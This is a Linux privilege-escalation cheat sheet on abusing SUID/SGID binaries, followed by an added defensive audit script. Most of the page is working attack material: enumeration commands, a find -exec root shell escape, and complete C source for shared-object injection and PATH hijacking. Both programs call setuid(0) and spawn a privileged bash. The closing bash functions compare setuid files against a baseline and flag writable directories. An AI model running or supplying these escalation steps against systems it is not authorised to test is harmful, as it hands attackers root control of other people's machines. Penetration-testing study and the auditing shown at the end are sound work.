SUID / SGID
Find with +s (when the find binary itself carries the SUID bit)
find /usr/bin -name find -exec /bin/bash -ip \;
SUID Commands
find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null > /tmp/suid
getcap -r / 2>/dev/null
SUID / SGID Executables - Known Exploits
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
- try to find an existing exploit for the findings (focus first on binaries whose version is known) on https://www.exploit-db.com
SUID / SGID Executables - Shared Object Injection
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
- Run strace on the binary and search the output for open/access calls and for "no such file" errors:
strace <program-location> 2>&1 | grep -iE "open|access|no such file"
- If the trace shows the binary trying to load a shared object that does not exist (for example /home/user/.config/libcalc.so), recreate it at that path with your own code
- Check whether that path, or anything else the binary loads, is writable by you
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
libcalc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */

/* constructor: runs automatically when the SUID binary loads this library */
static void inject() __attribute__((constructor));
static void inject() {
    setuid(0);              /* make the effective root uid the real uid too */
    system("/bin/bash -p"); /* -p keeps the privileges in the spawned shell */
}
SUID / SGID Executables - Environment Variables
Run strings on the binary to list its printable strings and look for command names called without an absolute path:
strings /usr/local/bin/suid-env
One line ("service apache2 start") suggests that the service executable is being called to start the web server, but without its full path (/usr/sbin/service). Because the binary relies on PATH lookup, a directory we control placed earlier in PATH lets us substitute our own service executable.
gcc -o /tmp/hack-lib/service /home/user/tools/suid/service.c
service.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

/* stand-in "service" binary found via PATH instead of /usr/sbin/service */
int main() {
    setuid(0);
    system("/bin/bash -p");
    return 0;
}
Prepend the directory holding the fake service binary to PATH:
PATH=/tmp/hack-lib:$PATH
Run the SUID binary; it now executes /tmp/hack-lib/service as root:
/usr/local/bin/suid-env
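The SUID enumeration commands at the top of this page and the "check if you can overwrite something" step, turned into a defender-side audit script. This is an added example, not code from the original cheat-sheet; it assumes GNU find and a baseline file listing one known-good absolute path per line.

```shell
#!/usr/bin/env bash
# Added audit helper, not part of the original cheat-sheet. Enumerates
# set-UID / set-GID files under ROOT (GNU find assumed), reports any that
# are missing from a known-good baseline (one absolute path per line; the
# format is an assumption), and flags files whose parent directory is
# group- or world-writable, which is the condition the shared-object and
# PATH substitution tricks above depend on.

# list_setuid ROOT -> one line per setuid/setgid regular file:
#   path<TAB>octal mode<TAB>owner<TAB>group   (sorted by path)
list_setuid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%p\t%m\t%u\t%g\n' 2>/dev/null | sort
}

# new_since_baseline BASELINE_FILE ROOT -> paths under ROOT carrying a
# setuid/setgid bit that are absent from BASELINE_FILE. Exit status follows
# grep -v: 0 if something new was found, 1 if the set matches the baseline.
new_since_baseline() {
    list_setuid "$2" | cut -f1 | grep -v -x -F -f "$1"
}

# writable_parent_dirs ROOT -> setuid/setgid files sitting in a directory
# that users other than the owner can write to (mode has g+w or o+w).
writable_parent_dirs() {
    list_setuid "$1" | while IFS="$(printf '\t')" read -r path rest; do
        dir=$(dirname "$path")
        if [ -n "$(find "$dir" -maxdepth 0 -perm /022 2>/dev/null)" ]; then
            printf '%s\n' "$path"
        fi
    done
}
```

Run `list_setuid / > baseline.txt` on a known-good host, then schedule `new_since_baseline baseline.txt /` and `writable_parent_dirs /` and alert on any output.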